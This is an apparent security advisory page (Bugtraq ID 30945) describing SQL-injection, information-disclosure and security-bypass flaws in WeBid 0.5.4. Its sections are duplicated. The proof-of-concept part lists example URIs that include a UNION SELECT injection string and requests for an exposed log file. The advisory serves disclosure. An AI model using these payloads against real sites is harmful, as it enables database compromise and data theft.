WeBid Multiple Input Validation Vulnerabilities
BID:30945
Info
WeBid Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 30945 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-7118 CVE-2008-7116 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 31 2008 12:00AM |
| Updated: | Jul 05 2016 10:01PM |
| Credit: | Fisher762, Stack |
| Vulnerable: |
WeBid WeBid 0.5.4 |
| Not Vulnerable: | |
Discussion
WeBid Multiple Input Validation Vulnerabilities
WeBid is prone to multiple input-validation vulnerabilities:
- SQL-injection issues
- an information-disclosure issue
- a security-bypass issue
Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WeBid 0.5.4 is vulnerable to the issues; other versions may also be affected.
WeBid is prone to multiple input-validation vulnerabilities:
- SQL-injection issues
- an information-disclosure issue
- a security-bypass issue
Exploiting these issues could allow an attacker to obtain sensitive information, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
WeBid 0.5.4 is vulnerable to the issues; other versions may also be affected.
Exploit / POC
WeBid Multiple Input Validation Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/webid/eledicss.php?nid=0&cd=themes/default&file=style.css
http://www.example.com/webid/logs/cron.log
http://www.example.com/webid/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/webid/eledicss.php?nid=0&cd=themes/default&file=style.css
http://www.example.com/webid/logs/cron.log
http://www.example.com/webid/item.php?id=-1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
Solution / Fix
WeBid Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].